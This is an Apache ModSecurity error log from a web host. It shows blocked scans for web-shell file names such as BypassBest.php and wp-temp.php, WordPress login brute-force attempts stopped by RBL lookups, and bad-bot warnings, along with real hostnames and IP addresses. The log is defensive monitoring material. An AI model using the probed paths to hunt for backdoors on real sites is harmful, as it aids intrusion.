[Tue May 26 19:01:55.218978 2026] [security2:error] [pid 1045635:tid 1045886] [client 20.206.111.203:4575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZawAAAHk"]
[Tue May 26 19:01:55.219133 2026] [security2:error] [pid 1045635:tid 1045886] [client 20.206.111.203:4575] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZawAAAHk"]
[Tue May 26 19:01:55.400124 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.151.130.61:31322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZbwAAADM"]
[Tue May 26 19:01:55.400252 2026] [security2:error] [pid 1045635:tid 1045816] [client 20.151.130.61:31322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZbwAAADM"]
[Tue May 26 19:01:55.452338 2026] [security2:error] [pid 1045635:tid 1045884] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZYAAAAHc"]
[Tue May 26 19:01:55.916306 2026] [security2:error] [pid 1045635:tid 1045852] [client 20.206.111.203:4595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZgAAAAFc"]
[Tue May 26 19:01:55.916415 2026] [security2:error] [pid 1045635:tid 1045852] [client 20.206.111.203:4595] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZgAAAAFc"]
[Tue May 26 19:01:55.971148 2026] [security2:error] [pid 1045635:tid 1045892] [client 20.151.130.61:19420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZgQAAAH8"]
[Tue May 26 19:01:55.971274 2026] [security2:error] [pid 1045635:tid 1045892] [client 20.151.130.61:19420] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahWgyxhDcQXYr7SS5sUZgQAAAH8"]
[Tue May 26 19:01:56.280665 2026] [security2:error] [pid 1045635:tid 1045825] [client 20.151.130.61:31333] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/css/dist/"] [unique_id "ahWgzBhDcQXYr7SS5sUZhQAAADw"]
[Tue May 26 19:01:56.356201 2026] [security2:error] [pid 1045635:tid 1045799] [client 20.151.130.61:31297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzBhDcQXYr7SS5sUZjwAAACI"]
[Tue May 26 19:01:56.433327 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:31333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWgzBhDcQXYr7SS5sUZkAAAAG4"]
[Tue May 26 19:01:56.433455 2026] [security2:error] [pid 1045635:tid 1045875] [client 20.151.130.61:31333] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahWgzBhDcQXYr7SS5sUZkAAAAG4"]
[Tue May 26 19:01:56.827594 2026] [security2:error] [pid 1045635:tid 1045786] [client 20.151.130.61:19629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/l10n/"] [unique_id "ahWgzBhDcQXYr7SS5sUZngAAABU"]
[Tue May 26 19:01:56.905847 2026] [security2:error] [pid 1045635:tid 1045802] [client 20.151.130.61:31297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzBhDcQXYr7SS5sUZnwAAACU"]
[Tue May 26 19:01:56.990325 2026] [security2:error] [pid 1045635:tid 1045876] [client 20.151.130.61:19629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/"] [unique_id "ahWgzBhDcQXYr7SS5sUZoAAAAG8"]
[Tue May 26 19:01:57.079152 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.151.130.61:31297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzRhDcQXYr7SS5sUZoQAAAA4"]
[Tue May 26 19:01:57.271547 2026] [security2:error] [pid 1045635:tid 1045784] [client 20.206.111.203:5005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahWgzRhDcQXYr7SS5sUZpwAAABM"]
[Tue May 26 19:01:57.492577 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:19629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZrwAAAGo"]
[Tue May 26 19:01:57.492700 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:19629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZrwAAAGo"]
[Tue May 26 19:01:57.585117 2026] [security2:error] [pid 1045635:tid 1045815] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzRhDcQXYr7SS5sUZsgAAADI"]
[Tue May 26 19:01:57.756419 2026] [security2:error] [pid 1045635:tid 1045748] [remote 168.63.79.147:48760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZsQAAK3A"]
[Tue May 26 19:01:57.763412 2026] [security2:error] [pid 1045635:tid 1045834] [client 20.206.111.203:5005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahWgzRhDcQXYr7SS5sUZtAAAAEU"]
[Tue May 26 19:01:57.941039 2026] [security2:error] [pid 1045635:tid 1045826] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzRhDcQXYr7SS5sUZvgAAAD0"]
[Tue May 26 19:01:57.972956 2026] [security2:error] [pid 1045635:tid 1045743] [remote 195.22.7.28:57640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.7.22.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZswAAMGs"]
[Tue May 26 19:01:57.983327 2026] [security2:error] [pid 1045635:tid 1045825] [client 20.151.130.61:38344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZwwAAADw"]
[Tue May 26 19:01:57.983420 2026] [security2:error] [pid 1045635:tid 1045825] [client 20.151.130.61:38344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZwwAAADw"]
[Tue May 26 19:01:58.118256 2026] [security2:error] [pid 1045635:tid 1045798] [client 20.206.111.203:5005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWgzhhDcQXYr7SS5sUZzQAAACE"]
[Tue May 26 19:01:58.118376 2026] [security2:error] [pid 1045635:tid 1045798] [client 20.206.111.203:5005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWgzhhDcQXYr7SS5sUZzQAAACE"]
[Tue May 26 19:01:58.387369 2026] [security2:error] [pid 1045635:tid 1045818] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgzRhDcQXYr7SS5sUZwgAAADU"]
[Tue May 26 19:01:58.787182 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWgzhhDcQXYr7SS5sUZ3AAAAF8"]
[Tue May 26 19:01:58.787267 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19439] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahWgzhhDcQXYr7SS5sUZ3AAAAF8"]
[Tue May 26 19:01:59.117094 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.206.111.203:4584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ6AAAAGo"]
[Tue May 26 19:01:59.117204 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.206.111.203:4584] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ6AAAAGo"]
[Tue May 26 19:01:59.375950 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.151.130.61:57751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ6gAAADE"]
[Tue May 26 19:01:59.376107 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.151.130.61:57751] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ6gAAADE"]
[Tue May 26 19:01:59.681875 2026] [security2:error] [pid 1045635:tid 1045637] [remote 154.66.198.148:61380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ8QAAGQE"]
[Tue May 26 19:01:59.770508 2026] [security2:error] [pid 1045635:tid 1045873] [client 20.206.111.203:4606] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahWgzxhDcQXYr7SS5sUZ9wAAAGw"]
[Tue May 26 19:01:59.796115 2026] [security2:error] [pid 1045635:tid 1045820] [client 20.151.130.61:19437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ-AAAADc"]
[Tue May 26 19:01:59.796227 2026] [security2:error] [pid 1045635:tid 1045820] [client 20.151.130.61:19437] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahWgzxhDcQXYr7SS5sUZ-AAAADc"]
[Tue May 26 19:01:59.949291 2026] [security2:error] [pid 1045635:tid 1045774] [client 20.206.111.203:4560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgzxhDcQXYr7SS5sUZ_AAAAAk"]
[Tue May 26 19:02:00.022722 2026] [security2:error] [pid 1045635:tid 1045752] [remote 195.22.7.28:57640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.7.22.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaAgAACnQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:02:00.134249 2026] [security2:error] [pid 1045635:tid 1045851] [client 20.206.111.203:4606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaCAAAAFY"]
[Tue May 26 19:02:00.134415 2026] [security2:error] [pid 1045635:tid 1045851] [client 20.206.111.203:4606] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaCAAAAFY"]
[Tue May 26 19:02:00.199518 2026] [security2:error] [pid 1045635:tid 1045753] [remote 154.66.198.148:61380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaCQAAAnU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:02:00.391229 2026] [security2:error] [pid 1045635:tid 1045843] [client 20.151.130.61:19427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaCwAAAE4"]
[Tue May 26 19:02:00.391323 2026] [security2:error] [pid 1045635:tid 1045843] [client 20.151.130.61:19427] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaCwAAAE4"]
[Tue May 26 19:02:00.896426 2026] [security2:error] [pid 1045635:tid 1045819] [client 20.206.111.203:4569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaJgAAADY"]
[Tue May 26 19:02:00.896527 2026] [security2:error] [pid 1045635:tid 1045819] [client 20.206.111.203:4569] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaJgAAADY"]
[Tue May 26 19:02:01.050259 2026] [security2:error] [pid 1045635:tid 1045869] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg0BhDcQXYr7SS5sUaGwAAAGg"]
[Tue May 26 19:02:01.112091 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:31302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaKgAAAGo"]
[Tue May 26 19:02:01.112234 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:31302] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaKgAAAGo"]
[Tue May 26 19:02:01.571027 2026] [security2:error] [pid 1045635:tid 1045867] [client 20.206.111.203:5073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaLQAAAGY"]
[Tue May 26 19:02:01.571145 2026] [security2:error] [pid 1045635:tid 1045867] [client 20.206.111.203:5073] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaLQAAAGY"]
[Tue May 26 19:02:01.976522 2026] [security2:error] [pid 1045635:tid 1045845] [client 20.151.130.61:31338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaOgAAAFA"]
[Tue May 26 19:02:01.976622 2026] [security2:error] [pid 1045635:tid 1045845] [client 20.151.130.61:31338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahWg0RhDcQXYr7SS5sUaOgAAAFA"]
[Tue May 26 19:02:02.144410 2026] [security2:error] [pid 1045635:tid 1045767] [client 34.195.212.30:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWg0hhDcQXYr7SS5sUaRQAAAAI"]
[Tue May 26 19:02:02.144813 2026] [security2:error] [pid 1045635:tid 1045837] [client 34.195.212.30:25138] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWg0hhDcQXYr7SS5sUaQgAAAEg"]
[Tue May 26 19:02:02.202932 2026] [security2:error] [pid 1045635:tid 1045862] [client 20.206.111.203:4581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWg0hhDcQXYr7SS5sUaSQAAAGE"]
[Tue May 26 19:02:02.203086 2026] [security2:error] [pid 1045635:tid 1045862] [client 20.206.111.203:4581] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWg0hhDcQXYr7SS5sUaSQAAAGE"]
